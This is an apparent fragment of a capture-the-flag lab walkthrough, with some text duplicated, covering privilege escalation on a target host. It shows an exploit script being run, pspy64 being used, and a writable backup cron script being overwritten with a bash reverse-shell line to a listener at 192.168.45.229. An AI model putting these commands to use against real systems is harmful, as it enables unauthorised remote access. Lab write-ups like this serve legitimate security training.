8338
python3 exploit.py 192.168.45.229 8338 http://192.168.182.32:8338
Running pspy64: 
Checking permissions for etc_Backup.sh: 
We can write to it.
Now we get a shell: 
We used penelope to catch the shell in this image.
Last updated
python3 exploit.py 192.168.45.229 8338 http://192.168.182.32:8338Running pspy64: Checking permissions for etc_Backup.sh: We can write to it.
Now we get a shell: We used penelope to catch the shell in this image.
Last updated
sudo rlwrap -nlvp 8338echo '#!/bin/bash' > etc_Backup.sh
echo 'bash -i >& /dev/tcp/192.168.45.229/80 0>&1' >> etc_Backup.sh